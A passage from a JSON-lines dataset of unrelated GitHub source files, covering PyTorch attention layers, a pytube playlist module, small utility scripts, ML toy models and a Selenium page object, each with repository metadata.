out_features=512\n        self.fc = nn.Linear(n_head * d_v, d_model, bias=False)\n\n        self.attention = ScaledDotProductAttention(temperature=d_k ** 0.5)\n\n        self.dropout = nn.Dropout(dropout)\n        self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)\n\n\n    def forward(self, q, k, v, mask=None):\n\n        d_k, d_v, n_head = self.d_k, self.d_v, self.n_head\n        len_q, len_k, len_v = q.size(1), k.size(1), v.size(1)\n\n        residual = q\n\n        # Pass through the pre-attention projection: b x lq x (n*dv)\n        # Separate different heads: b x lq x n x dv\n        q = self.w_qs(q).view(-1, len_q, n_head, d_k) # a linear projection of the input gives the Q matrix: 36 tokens, each with 8 heads of 64 dims, reshaped to the multi-head format (256, 36, 8, 64); note it is not expanded directly to (256,8,36,64) because the linear layer outputs d_k*n_head, so the head axis has to be moved by a transpose\n        k = self.w_ks(k).view(-1, len_k, n_head, d_k) # K\n        v = self.w_vs(v).view(-1, len_v, n_head, d_v) # V\n\n        # Transpose for attention dot product: b x n x lq x dv\n        q, k, v = q.transpose(1, 2), k.transpose(1, 2), v.transpose(1, 2) # transposed to 8 heads in total, each head 36*64, i.e. (256, 8, 36, 64)\n\n        if mask is not None:\n            mask = mask.unsqueeze(1)   # For head axis broadcasting. 
# in the encoder, (256,1,36) → (256,1,1,36); broadcasting applies automatically along any axis of size 1; in the decoder, [256,32,32] → [256,1,32,32]\n\n        q, attn = self.attention(q, k, v, mask=mask) # q = [256, 8, 36, 64], attn=[256, 8, 36, 36]\n\n        # Transpose to move the head dimension back: b x lq x n x dv\n        # Combine the last two dimensions to concatenate all the heads together: b x lq x (n*dv)\n        q = q.transpose(1, 2).contiguous().view(-1, len_q, self.n_head * self.d_v)\n        q = self.dropout(self.fc(q))\n        q += residual\n\n        q = self.layer_norm(q)\n\n        return q, attn\n\n\nclass PositionwiseFeedForward(nn.Module):\n    ''' A two-feed-forward-layer module '''\n\n    def __init__(self, d_in, d_hid, dropout=0.1):\n        super().__init__()\n        self.w_1 = nn.Linear(d_in, d_hid) # position-wise # position-wise means the linear layer is applied at every position of the length-36 sequence, i.e. to the 512-dim input vector formed by 8 heads of 64 dims each\n        self.w_2 = nn.Linear(d_hid, d_in) # position-wise\n        self.layer_norm = nn.LayerNorm(d_in, eps=1e-6)\n        self.dropout = nn.Dropout(dropout)\n\n    def forward(self, x):\n\n        residual = x\n\n        x = self.w_2(F.relu(self.w_1(x)))\n        x = self.dropout(x)\n        x += residual\n\n        x = self.layer_norm(x)\n\n        return x\n","repo_name":"initxu/naranker","sub_path":"ranker/sublayers.py","file_name":"sublayers.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43721245830","text":"import os\nimport shutil\nfrom threading import Thread\nfrom core.daemon import get_config, set_config, logging\nfrom datetime import datetime\nfrom core.grabber import Grabbing\nfrom time import sleep\nfrom grabber.models.Emails import Zips\n\n'''\n    Checks the time and launches the download (grabber.py) at the configured time.\n    ClearZips deletes the old archives after the download finishes.\n'''\n\n\nclass GrabManager(Thread):\n\n    def __init__(self):\n        Thread.__init__(self)\n\n    def run(self):\n        logging('GrabManager', 'run...')\n        grab_managing()\n\n\ndef grab_managing():\n    logging('GrabManager', 'START')\n    if get_config('grab_management') == '1':\n        return\n    set_config('grab_management', '1')\n    # scan_time = get_config('scan_time')\n    try:\n        while True:\n            if datetime.now().time().strftime('%H:%M') == get_config('scan_time') and get_config('grabbing') == '0':\n                grabber = Grabbing()\n                grabber.start()\n            sleep(58)\n    finally:\n        set_config('grab_management', '0')\n\n\nclass ClearZips(Thread):\n\n    def __init__(self):\n        Thread.__init__(self)\n\n    def run(self):\n        clear_zips()\n\n\ndef clear_zips():\n    dirs = os.listdir('emails')\n    for the_dir in dirs:\n        shutil.rmtree(os.path.join('emails', the_dir), ignore_errors=True)\n    try:\n        Zips.objects.all().delete()\n    except Zips.DoesNotExist:\n        return 'error'\n    return 'ok'\n","repo_name":"atabayev/asar","sub_path":"core/grab_manager.py","file_name":"grab_manager.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17142044567","text":"# Python version 3.11.2\nimport os\n\n\ndef rename_files(path:str, new_img_name):\n    \"\"\" This function will rename the specified file to the specified name\n    Args:\n        path (str): pass your path where your files are stored\n        new_img_name (_type_): give the name of the image to rename\n    \"\"\"\n    \n    try:\n        img_list = os.listdir(path=path)\n        \n        for i, img_name in enumerate(img_list):\n            extension_name = img_name.split('.')[1]\n            old_img_path = os.path.join(path, img_name)\n            new_img_path = os.path.join(path, f\"{new_img_name}{i}.{extension_name}\")\n            os.rename(old_img_path, new_img_path)\n        print(\"Successfully renamed\")\n    
except Exception as e:\n        print(\"Oops!! \", e)\n        print(\"Please enter a valid path!!\")\n\n\nif __name__ == \"__main__\":\n    rename_files(path=\"C:\\\\Users\\\\alami\\\\Downloads\\\\New folder\", new_img_name=\"BangladeshFlag\")","repo_name":"alaminbhuyan/Python-Custom-Module","sub_path":"Rename Files Name/FilesRename.py","file_name":"FilesRename.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43231515190","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: kafkal\n@contact: 1051748335@qq.com\n@software: pycharm\n@file: 25.py\n@time: 2019/1/30 030 15:13\n@desc: Given a linked list, reverse its nodes k at a time and return the modified list.\nk is a positive integer whose value is less than or equal to the length of the list. If the total number of nodes is not a multiple of k, the leftover nodes at the end keep their original order.\nUses the list-based approach from problem 24.\n'''\nclass ListNode:\n    def __init__(self, x=None):\n        self.val = x\n        self.next = None\n\ndef reverseKGroup(head, k):\n    \"\"\"\n    :type head: ListNode\n    :type k: int\n    :rtype: ListNode\n    \"\"\"\n    nodes = []\n    out_nodes = []\n    if head != None and head.next != None:\n        curr = head\n        while curr != None:\n            nodes.append(curr)\n            curr = curr.next\n        max_len = len(nodes)\n        if max_len < k:\n            return head\n        if max_len > k:\n            if max_len % k == 0:\n                times = max_len // k - 1\n            else:\n                times = max_len // k\n            for i in range(times):\n                nodes_swap = nodes[k * i:k * i + 2*k]\n                if len(nodes_swap) % k == 0:\n                    for i in range(len(nodes_swap)):\n                        if i == k - 1:\n                            nodes_swap[-1-i].next = None\n                        elif i == 2*k -1:\n                            nodes_swap[-1-i].next = nodes_swap[-1]\n                        else:\n                            nodes_swap[-1 - i].next = nodes_swap[-2 - i]\n                    out_nodes.extend(nodes_swap)\n                else:\n                    for i in range(len(nodes_swap) - len(nodes_swap) % k - 1):\n                        nodes_swap[-1 - i-len(nodes_swap)%k].next = nodes_swap[-2 - i-len(nodes_swap)%k]\n                    nodes_swap[0].next = nodes_swap[len(nodes_swap) % k + 1]\n                    out_nodes.extend(nodes_swap)\n            return out_nodes[k-1]\n        else:\n            for i in range(max_len-1):\n                nodes[-1-i].next = nodes[-2-i]\n            nodes[0].next = None\n            return nodes[1]\n    elif head != None and head.next == None:\n        return head\n    else:\n        return None\n\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\nl1.next = l2\n# l2.next = l3\n# l3.next = l4\n# l4.next = l5\nout = reverseKGroup(l1,3)\nwhile out != None:\n    print(out.val)\n    out = out.next","repo_name":"kafkalm/LeetCode","sub_path":"LeetCode/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70120876241","text":"import tensorflow as tf\nimport numpy as np \nimport logging\n\nlogger =tf.get_logger()\nlogger.setLevel(logging.ERROR)\n\ncelsius_q = np.array([-40, -10, 0, 8, 15, 22, 38], dtype=float)\nfahrenheit_a = np.array([-40, 14, 32, 46, 59, 72, 100], dtype=float)\n\nfor i,c in enumerate(celsius_q):\n    print(\"{} degrees Celsius = {} degrees Fahrenheit\".format(c, fahrenheit_a[i]))\n    \nmodel = tf.keras.Sequential([tf.keras.layers.Dense(units=1,input_shape=[1])])\n#input_shape=[1] — This specifies that the input to this layer is a single value. That is, the shape is a one-dimensional array with one member. Since this is the first (and only) layer, that input shape is the input shape of the entire model. The single value is a floating point number, representing degrees Celsius.\n\n#units=1 — This specifies the number of neurons in the layer. The number of neurons defines how many internal variables the layer has to try to learn how to solve the problem (more later). 
Since this is the final layer, it is also the size of the model's output — a single float value representing degrees Fahrenheit. (In a multi-layered network, the size and shape of the layer would need to match the input_shape of the next layer.)\n\n\nmodel.compile(loss='mean_squared_error',optimizer=tf.keras.optimizers.Adam(0.1))\n#Loss function — A way of measuring how far off predictions are from the desired outcome. (The measured difference is called the \"loss\n\n#Optimizer function — A way of adjusting internal values in order to reduce the loss.\n\nhistory = model.fit(celsius_q, fahrenheit_a, epochs=500, verbose=False)\nprint(\"Finished training the model\")\nmodel.summary()\n\nprint(model.predict([100.0]))\n#\n#Feature: The input(s) to our model\n# Examples: An input/output pair used for training\n# Labels: The output of the model\n# Layer: A collection of nodes connected together within a neural network.\n# Model: The representation of your neural network\n# Dense and Fully Connected (FC): Each node in one layer is connected to each node in the previous layer.\n# Weights and biases: The internal variables of model\n# Loss: The discrepancy between the desired output and the actual output\n# MSE: Mean squared error, a type of loss function that counts a small number of large discrepancies as worse than a large number of small ones.\n# Gradient Descent: An algorithm that changes the internal variables a bit at a time to gradually reduce the loss function.\n# Optimizer: A specific implementation of the gradient descent algorithm. (There are many algorithms for this. In this course we will only use the “Adam” Optimizer, which stands for ADAptive with Momentum. It is considered the best-practice optimizer.)\n# Learning rate: The “step size” for loss improvement during gradient descent.\n# Batch: The set of examples used during training of the neural network\n# Epoch: A full pass over the entire training dataset\n# Forward pass: The computation of output values from input\n# Backward pass (backpropagation): The calculation of internal variable adjustments according to the optimizer algorithm, starting from the output layer and working back through each layer to the input.\n\n#\n","repo_name":"HarryTanNguyen/Deep-Learning-Tensoflow-file","sub_path":"Tensorflow_Udacity/celsius2fahrenheit.py","file_name":"celsius2fahrenheit.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24926379852","text":"# -*- coding: utf-8 -*-\n\"\"\"Module to download a complete playlist from a youtube channel.\"\"\"\nimport json\nimport logging\nimport re\nfrom collections.abc import Sequence\nfrom datetime import date\nfrom datetime import datetime\nfrom typing import Dict, Tuple\nfrom typing import Iterable\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\nfrom pytube import extract\nfrom pytube import request\nfrom pytube import YouTube\nfrom pytube.helpers import cache\nfrom pytube.helpers import install_proxy\nfrom pytube.helpers import regex_search\nfrom pytube.helpers import uniqueify\n\nlogger = logging.getLogger(__name__)\n\n\nclass Playlist(Sequence):\n \"\"\"Load a YouTube playlist with URL\"\"\"\n\n def __init__(self, url: str, proxies: Optional[Dict[str, str]] = None):\n if proxies:\n install_proxy(proxies)\n\n self.playlist_id = extract.playlist_id(url)\n\n self.playlist_url = (\n f\"https://www.youtube.com/playlist?list={self.playlist_id}\"\n )\n self.html = 
request.get(self.playlist_url)\n\n def _paginate(\n self, until_watch_id: Optional[str] = None\n ) -> Iterable[List[str]]:\n \"\"\"Parse the video links from the page source, yields the /watch?v=\n part from video link\n\n :param until_watch_id Optional[str]: YouTube Video watch id until\n which the playlist should be read.\n\n :rtype: Iterable[List[str]]\n :returns: Iterable of lists of YouTube watch ids\n \"\"\"\n req = self.html\n videos_urls, continuation = self._extract_videos(\n json.dumps(extract.initial_data(self.html))\n )\n if until_watch_id:\n try:\n trim_index = videos_urls.index(f\"/watch?v={until_watch_id}\")\n yield videos_urls[:trim_index]\n return\n except ValueError:\n pass\n yield videos_urls\n\n # Extraction from a playlist only returns 100 videos at a time\n # if self._extract_videos returns a continuation there are more\n # than 100 songs inside a playlist, so we need to add further requests\n # to gather all of them\n if continuation:\n load_more_url, headers = self._build_continuation_url(continuation)\n else:\n load_more_url, headers = None, None\n\n while load_more_url and headers: # there is an url found\n logger.debug(\"load more url: %s\", load_more_url)\n # requesting the next page of videos with the url generated from the\n # previous page\n req = request.get(load_more_url, extra_headers=headers)\n # extract up to 100 songs from the page loaded\n # returns another continuation if more videos are available\n videos_urls, continuation = self._extract_videos(req)\n if until_watch_id:\n try:\n trim_index = videos_urls.index(f\"/watch?v={until_watch_id}\")\n yield videos_urls[:trim_index]\n return\n except ValueError:\n pass\n yield videos_urls\n\n if continuation:\n load_more_url, headers = self._build_continuation_url(\n continuation\n )\n else:\n load_more_url, headers = None, None\n\n @staticmethod\n def _build_continuation_url(continuation: str) -> Tuple[str, dict]:\n \"\"\"Helper method to build the url and headers required to request\n the next page of videos\n\n :param str continuation: Continuation extracted from the json response\n of the last page\n :rtype: Tuple[str, dict]\n :returns: Tuple of an url and required headers for the next http\n request\n \"\"\"\n return (\n (\n f\"https://www.youtube.com/browse_ajax?ctoken=\"\n f\"{continuation}&continuation={continuation}\"\n ),\n {\n \"X-YouTube-Client-Name\": \"1\",\n \"X-YouTube-Client-Version\": \"2.20200720.00.02\",\n },\n )\n\n @staticmethod\n def _extract_videos(raw_json: str) -> Tuple[List[str], Optional[str]]:\n \"\"\"Extracts videos from a raw json page\n\n :param str raw_json: Input json extracted from the page or the last\n server response\n :rtype: Tuple[List[str], Optional[str]]\n :returns: Tuple containing a list of up to 100 video watch ids and\n a continuation token, if more videos are available\n \"\"\"\n initial_data = json.loads(raw_json)\n try:\n # this is the json tree structure, if the json was extracted from\n # html\n section_contents = initial_data[\"contents\"][\n \"twoColumnBrowseResultsRenderer\"][\n \"tabs\"][0][\"tabRenderer\"][\"content\"][\n \"sectionListRenderer\"][\"contents\"]\n try:\n # Playlist without submenus\n important_content = section_contents[\n 0][\"itemSectionRenderer\"][\n \"contents\"][0][\"playlistVideoListRenderer\"]\n except (KeyError, IndexError, TypeError):\n # Playlist with submenus\n important_content = section_contents[\n 1][\"itemSectionRenderer\"][\n \"contents\"][0][\"playlistVideoListRenderer\"]\n videos = important_content[\"contents\"]\n 
except (KeyError, IndexError, TypeError):\n try:\n # this is the json tree structure, if the json was directly sent\n # by the server in a continuation response\n important_content = initial_data[1]['response']['onResponseReceivedActions'][\n 0\n ]['appendContinuationItemsAction']['continuationItems']\n videos = important_content\n except (KeyError, IndexError, TypeError) as p:\n print(p)\n return [], None\n\n try:\n continuation = videos[-1]['continuationItemRenderer'][\n 'continuationEndpoint'\n ]['continuationCommand']['token']\n videos = videos[:-1]\n except (KeyError, IndexError):\n # if there is an error, no continuation is available\n continuation = None\n\n # remove duplicates\n return (\n uniqueify(\n list(\n # only extract the video ids from the video data\n map(\n lambda x: (\n f\"/watch?v=\"\n f\"{x['playlistVideoRenderer']['videoId']}\"\n ),\n videos\n )\n ),\n ),\n continuation,\n )\n\n def trimmed(self, video_id: str) -> Iterable[str]:\n \"\"\"Retrieve a list of YouTube video URLs trimmed at the given video ID\n\n i.e. if the playlist has video IDs 1,2,3,4 calling trimmed(3) returns\n [1,2]\n :type video_id: str\n video ID to trim the returned list of playlist URLs at\n :rtype: List[str]\n :returns:\n List of video URLs from the playlist trimmed at the given ID\n \"\"\"\n for page in self._paginate(until_watch_id=video_id):\n yield from (self._video_url(watch_path) for watch_path in page)\n\n @property # type: ignore\n @cache\n def video_urls(self) -> List[str]:\n \"\"\"Complete links of all the videos in playlist\n\n :rtype: List[str]\n :returns: List of video URLs\n \"\"\"\n return [\n self._video_url(video)\n for page in list(self._paginate())\n for video in page\n ]\n\n @property\n def videos(self) -> Iterable[YouTube]:\n \"\"\"Yields YouTube objects of videos in this playlist\n\n :Yields: YouTube\n \"\"\"\n yield from (YouTube(url) for url in self.video_urls)\n\n def __getitem__(self, i: Union[slice, int]) -> Union[str, List[str]]:\n return self.video_urls[i]\n\n def __len__(self) -> int:\n return len(self.video_urls)\n\n def __repr__(self) -> str:\n return f\"{self.video_urls}\"\n\n @property\n @cache\n def last_updated(self) -> Optional[date]:\n date_match = re.search(\n r\"Last updated on (\\w{3}) (\\d{1,2}), (\\d{4})\", self.html\n )\n if date_match:\n month, day, year = date_match.groups()\n return datetime.strptime(\n f\"{month} {day:0>2} {year}\", \"%b %d %Y\"\n ).date()\n return None\n\n @property\n @cache\n def title(self) -> Optional[str]:\n \"\"\"Extract playlist title\n\n :return: playlist title (name)\n :rtype: Optional[str]\n \"\"\"\n pattern = r\"(.+?)\"\n return regex_search(pattern, self.html, 1).replace(\"- YouTube\", \"\").strip()\n\n @staticmethod\n def _video_url(watch_path: str):\n return f\"https://www.youtube.com{watch_path}\"\n","repo_name":"manuanish/YoutubeDownloader","sub_path":"venv/Lib/site-packages/pytube/contrib/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"391495175","text":"import datetime\n\n\ndeposite_schema = {\n 'amount': {\n 'type': int, \n 'constrains': lambda val: val >= 10e3 and val <= 3e6,\n 'constrains_description': 'От 10 000 до 3 000 000'\n },\n 'periods': {\n 'type': int,\n 'constrains': lambda val: val >= 1 and val <= 60,\n 'constrains_description': 'От 1 до 60'\n },\n 'rate': {\n 'type': int,\n 'constrains': lambda val: val >= 1 and val <= 8,\n 'constrains_description': 'От 1 до 
8'\n },\n 'date': {\n 'type': datetime.date,\n 'constrains': lambda val: val.day >=28 and val.day <= 31, # The date should probably be the last day of the month\n 'constrains_description': 'The date must be the last day of the month'\n }\n}\n\n\ndef assert_err_to_false(func):\n '''AssertionError is substituted with False'''\n def wrapper(req_json):\n try:\n return func(req_json)\n\n except AssertionError as e:\n return e.args[-1]\n\n except (ValueError, TypeError): # Raised by invalid dates\n return f'The \"date\" field does not match the \"dd.mm.YYYY\" format'\n\n return wrapper\n\n\n@assert_err_to_false\ndef validate_deposite(req_json: dict) -> str:\n '''Validates that required fields are present, field types match and value constraints hold\n Returns:\n True - if validation passed\n str - a message describing the cause of the error\n Handled by the decorator:\n On AssertionError only the error text is returned\n ValueError can occur when converting a string to datetime'''\n\n temp_json = dict( # Are extra fields an error?\n filter(lambda x: x[0] in deposite_schema, req_json.items()) # And what if the removed fields are needed for further processing?\n ) # That is why a copy is created and filtered, not the original request\n\n assert temp_json.keys() == deposite_schema.keys(), \\\n f'Not all required parameters were passed; the following are missing: {set(temp_json) ^ set(deposite_schema)}'\n\n # Converting the date into an object may raise ValueError - caught by the decorator as a validation error\n req_json['date'] = datetime.datetime.strptime(temp_json['date'], '%d.%m.%Y').date() # Happens only after checking that the 'date' key is present in the request\n temp_json['date'] = req_json['date']\n\n for key in temp_json.keys():\n\n assert isinstance(temp_json[key], deposite_schema[key]['type']), \\\n f'The {key} field must be of type {deposite_schema[key][\"type\"]}'\n\n assert deposite_schema[key]['constrains'](temp_json[key]), \\\n f'The {key} field violates its constraint - {deposite_schema[key][\"constrains_description\"]}'\n\n return True\n","repo_name":"Kronars/deposite_calc","sub_path":"app/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12129573721","text":"from my_model import Maze\nfrom UCB import UCBTable\nfrom spinup.utils.logx import EpochLogger\n\n#before main loop of UCB, each bandit should be chosen for once, and do not increase T in this time\nlogger = EpochLogger()\n# logger.save_config(locals())\n\ndef learn_init(RL):\n for action in RL.actions:\n print(RL.actions)\n # initial observation each time\n observation = env.reset()\n env.render()\n observation_, reward, done = env.step(action)\n\n # RL learn from this transition\n RL.learn(str(observation), action, reward, str(observation_),init = True)\n\n # swap observation, in tradition MAB, they are the same\n observation = observation_\n pass\n\ndef update():\n for episode in range(100):\n # initial observation\n observation = env.reset()\n\n while True:\n # fresh env\n env.render()\n\n # RL choose action based on observation\n action = RL.choose_action(str(observation))\n\n # RL take action and get next observation and reward\n observation_, reward, done = env.step(action)\n\n # RL learn from this transition\n RL.learn(str(observation), action, reward, str(observation_))\n\n # swap observation\n observation = observation_\n \n #['u', 'd', 'l', 'r'] = [0,1,2,3]\n logger.store(UCBmax=RL.UCBtable[RL.max_index])\n
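The decorated validator above either returns True or an explanatory message string, which makes it easy to exercise directly. A minimal usage sketch (the request values here are made up, not from the original repo):

req = {'amount': 20000, 'periods': 12, 'rate': 5, 'date': '31.01.2021'}
print(validate_deposite(dict(req)))             # True
print(validate_deposite(dict(req, amount=5)))   # constraint message for 'amount'
print(validate_deposite({'amount': 20000}))     # message listing the missing keys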
logger.store(ut_d=RL.actions_table[1][1]/RL.actions_table[1][0])\n logger.store(ut_u=RL.actions_table[0][1]/RL.actions_table[0][0])\n logger.store(ut_l=RL.actions_table[2][1]/RL.actions_table[2][0])\n logger.store(ut_r=RL.actions_table[3][1]/RL.actions_table[3][0])\n # break while loop when end of this episode\n if done:\n break\n\n # end of game\n logger.log_tabular('UCBmax', with_min_and_max=True)\n logger.log_tabular('ut_d', with_min_and_max=True)\n logger.log_tabular('ut_u', with_min_and_max=True)\n logger.log_tabular('ut_l', with_min_and_max=True)\n logger.log_tabular('ut_r', with_min_and_max=True)\n logger.dump_tabular()\n print('game over')\n env.destroy()\n\n#ucb learn\n#UCB will forever be changed to these unexplored ones, because of the increase of t\nif __name__ == \"__main__\":\n env = Maze()\n RL = UCBTable(actions=list(range(env.n_actions)))\n learn_init(RL)\n\n env.after(50, update)\n env.mainloop()\n","repo_name":"lanpokn/UCB","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37434554358","text":"#*-* coding: utf-8 *-*\r\nimport urllib.request\r\nimport re\r\nheaders = {}\r\nheaders['User-Agent'] = \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0\"\r\n \r\nreq = urllib.request.Request('https://proufu.ru/', headers = headers)\r\nhtml = urllib.request.urlopen(req).read()\r\nhtml = html.decode('utf-8')\r\n\r\nparagraphs = re.findall(r'\r\n    (.*?)\r\n    ',str(html))\r\n\r\nfor html1 in paragraphs:\r\n print(html1)\r\n","repo_name":"planprm/parserpython","sub_path":"webparser.py","file_name":"webparser.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6872111456","text":"import sys\nfor line in sys.stdin:\n nums = line[:-1].split('.')\n if len(nums) > 1:\n zs, xs = nums[0], nums[1][:2]\n else:\n zs, xs = nums[0], '00'\n\n negative = False\n if zs.startswith('-'):\n negative = True\n zs = zs[1:]\n if(len(zs) == 0):\n zs = '0'\n if len(zs) > 3:\n zslist = []\n zs = zs[::-1]\n for i in range(1 + len(zs) // 3):\n zslist.append(zs[3*i:3*i+3])\n zs = ','.join(zslist)[::-1]\n if zs.startswith(','):\n zs = zs[1:]\n\n if len(xs) < 2:\n xs += '0'\n\n if negative:\n print('(${}.{})'.format(zs,xs))\n else:\n print('${}.{}'.format(zs,xs))","repo_name":"AiRanthem/Algorithm-Course","sub_path":"货币规范化.py","file_name":"货币规范化.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"29735091170","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 2 10:46:55 2017\nRosalind exercise \"Counting Point Mutations\"\n@author: evelina\n\"\"\"\n\nimport sys\ntest = False\n\n# Define the input\nif test == True:\n # Use the sample FASTA file\n infile = open('sample.txt','r')\nelse:\n # Read the downloaded FASTA file\n infile_name = sys.argv[1]\n infile = open(infile_name,'r')\n# extract two sequence strings\nline_count = 0\nfor line in infile:\n line = line.strip('\\n')\n if line_count == 0:\n seq_a = line\n else:\n seq_b = line\n line_count += 1\n\n# Create a function to calculate the difference count in two sequences\ndef cal_dif(seq1,seq2):\n dif_counts = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n dif_counts += 1\n return(dif_counts)\n\n# Calculate the difference from file\ndif_num = cal_dif(seq_a,seq_b)\nprint(dif_num)\n ","repo_name":"Hz-Lin/wur_bioinfomatics","sub_path":"Advanced_Bioinformatics/week12_python/r06_Counting_Point_Mutations/CPM.py","file_name":"CPM.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36050476802","text":"import sys, os, json\r\nimport pandas as pd\r\nfrom json2html import *\r\n\r\nloop = 1\r\ncount = 0\r\ncheckerrors = 0\r\n\r\nprint(\"Convert JSON Discord chats to HTML or XLS\")\r\nprint()\r\nprint(\"https://abrignoni.blogspot.com\")\r\nprint(\"Twitter: @AlexisBrignoni\")\r\nprint()\r\n\r\nwhile loop == 1:\r\n\tprint (\"Write path to files: \")\r\n\tpath2input = input()\r\n\tif os.path.exists(path2input):\r\n\t\t#print (\"Directory exists -> \"+path2input)\r\n\t\tloop = 2\r\n\telse:\r\n\t\tprint (\"Directory does not exist.\")\r\n\r\nwhile loop == 2:\r\n\tprint()\r\n\tprint (\"Select conversion format:\")\r\n\tprint (\"1: HTML\")\r\n\tprint (\"2: XLS\")\r\n\tselected = input()\r\n\tif (selected == \"1\"):\r\n\t\tloop = 3\r\n\t\tprint()\r\n\t\tprint (\"HTML selected\")\r\n\t\tprint()\r\n\t\t\r\n\telif (selected == \"2\"):\r\n\t\tprint()\r\n\t\tprint (\"XLS selected\")\r\n\t\tprint()\r\n\t\tloop = 3\r\n\telse:\r\n\t\tprint (\"Invalid selection.\")\r\n\t\t\r\n\r\nif (selected == \"2\"):\r\n\t# open folder to write to\r\n\tos.makedirs(path2input + \"/\" + \"converted-XLS\" + \"/\")\r\n\t#open folder to read from\r\n\tfor filename in os.listdir(path2input):\r\n\t\tcount = count+1\r\n\t\tif 
os.path.isdir(path2input + \"/\" + filename):\r\n\t\t\tcount=count-1 #make sure a directory check does not count as a processed file.\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tfile = open(path2input + \"/\" + filename, 'r')\r\n\t\t\t\tinput = file.read() \r\n\t\t\t\tfile.close()\r\n\t\t\t\tdata = pd.read_json(input)\r\n\t\t\t\tdata.to_excel(path2input + \"/\" + \"converted-XLS\" + \"/\" + filename +'.xls', index=False)\r\n\t\t\texcept:\r\n\t\t\t\tcheckerrors = 1;\r\n\t\t\t\tprint(\"Unable to convert: \"+ path2input + '/' + filename)\r\n\t\t\t\terrors = open(path2input + \"/converted-XLS/error.txt\", 'a')\r\n\t\t\t\terrors.write(\"Unable to convert: \"+ path2input + '/' + filename + '\\n')\r\n\t\t\t\terrors.close()\t\t\r\n\t\t\t\tpass\r\n\t\t\t\r\nif (selected == \"1\"):\r\n\tos.makedirs(path2input + \"/\" + \"converted-HTML\" + \"/\")\r\n\tfor filename in os.listdir(path2input):\r\n\t\tcount = count+1\r\n\t\tif os.path.isdir(path2input + \"/\" + filename):\r\n\t\t\tcount=count-1 \r\n\t\telse:\n\t\t\ttry:\n\t\t\t\tfile = open(path2input + \"/\" + filename, 'r', encoding=\"utf-8\")\n\t\t\t\tinput = file.read() \n\t\t\t\tfile.close()\n\t\t\t\t\t\n\t\t\t\tafuera = json2html.convert(json = input, clubbing = False)\n\n\t\t\t\tfile = open(path2input + \"/\" + \"converted-HTML\" + \"/\" + filename +'.html', 'w', encoding=\"utf-8\")\n\t\t\t\tfile.write(afuera)\n\t\t\t\tfile.close()\n\t\t\texcept:\n\t\t\t\tprint(f'The {filename} file is not a valid json object')\n\t\t\t\tcount=count-1\n\r\nprint()\r\nprint(\"Files processed: \"+ str(count))\r\nprint()\r\n\r\nif (checkerrors == 1):\r\n\tprint(\"See error log: \"+ path2input + \"/\" + \"converted-XLS\" + \"/error.txt\" + \". Process as HTML to view contents of these files.\" )\r\n\t \r\n\r\nif (selected == \"2\"):\r\n\tprint()\r\n\tprint(\"Converted files located at: \" + path2input + \"/\" + \"converted-XLS\" + \"/\")\r\n\tprint()\r\n\tprint(\"Script will now close.\")\r\n\tos.system('pause')\r\n\r\nif (selected == \"1\"):\r\n\tprint()\r\n\tprint(\"Converted files located at: \" + path2input + \"/\" + \"converted-HTML\" + \"/\")\r\n\tprint()\r\n\tprint(\"Script will now close.\")\r\n\tos.system('pause')\r\n","repo_name":"abrignoni/JSON-to-HTML-and-XLS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"23962020395","text":"from classes.web.pages.Evaluationweb import Evaluationweb\nfrom miscellaneous.Misc import Misc\n\nGRADES_TABLE_ID = 'taula_38956696119'\nGRADE_ROWS_XPATH = './/tr[contains(@class,\"td\")]'\nGRADES_INPUT_XPATH = \".//input[@type='text']\"\nGRADES_SELECT_XPATH = \".//option[@selected='selected']\"\nHOURS_XPATH = './/b'\n\nclass StudentGradesWeb(Evaluationweb):\n\n def get_grade_from_cell(self,cell):\n grade_element = self.get_element_inside_element_by_xpath(cell,GRADES_INPUT_XPATH)\n if grade_element: return grade_element.get_attribute(\"value\")\n else: grade_element = self.get_element_inside_element_by_xpath(cell,GRADES_SELECT_XPATH)\n if grade_element: return grade_element.get_attribute(\"value\")\n else: return 0\n\n def get_hours_from_cell(self,cell):\n hours_cell = self.get_element_inside_element_by_xpath(cell,HOURS_XPATH)\n if (hours_cell) and Misc.try_parse(hours_cell.text): return int(hours_cell.text)\n else: return 0\n\n def 